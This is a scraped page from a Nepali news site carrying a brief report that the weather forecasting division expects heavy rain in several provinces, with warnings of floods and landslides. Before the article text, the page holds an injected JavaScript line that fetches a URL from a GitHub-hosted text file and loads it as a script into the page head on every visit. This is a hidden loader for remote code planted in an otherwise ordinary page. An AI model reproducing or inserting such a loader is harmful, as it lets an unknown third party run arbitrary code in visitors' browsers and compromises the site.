;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); आज देशका केही ठाउँमा ठूलो पानी पर्ने सम्भावना – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • आज देशका केही ठाउँमा ठूलो पानी पर्ने सम्भावना
समाचार

आज देशका केही ठाउँमा ठूलो पानी पर्ने सम्भावना

भदौ १,
काठमाण्डौ । आज देशका केही ठाउँमा ठूलो पानी पर्ने सम्भावना रहेको जल तथा मौसम पूर्वानुमान महाशाखाले जनाएको छ । गण्डकी प्रदेश, प्रदेश नम्बर ५, कर्णाली प्रदेश र सुदूरपश्चिम प्रदेशका थोरै ठाउँमा र प्रदेश १ तथा वाग्मती प्रदेशको एक/दुई ठाउँमा ठूलो पानी पर्ने सम्भावना रहेको मौसमविद् सजिना शाक्यले जानकारी दिए ।

अरु ठाउँमा भने सामान्यतया बदली रही केही ठाउँहरुमा मेघगर्जनसहित हल्कादेखि मध्यमखालको पानी पर्ने सम्भावना छ । मनसुनी न्यूनचापीय रेखा दक्षिणतर्फ भए पनि बंगालको खाडीमा बनेको न्यूनचापीय रेखाको प्रभावका कारण जलवाष्पयुक्त हावा देशभर फैलिएका कारण पानी पर्ने सम्भावना भएको उनले बताए ।

ठूलो पानी पर्नसक्ने सम्भावना देखिएको ठाउँका नदीमा पानीको बहाव बढ्ने, पहाडी क्षेत्रमा भू-क्षय हुने, पहिरो जाने र पानीको निकास नभएका ठाउँमा डुबानसमेत हुन सक्ने भएकाले सतर्कता अपनाउन मौसम पूर्वानुमान महाशाखाले आग्रह गरेको छ ।file Photo

फेसबुक प्रतिक्रियाहरु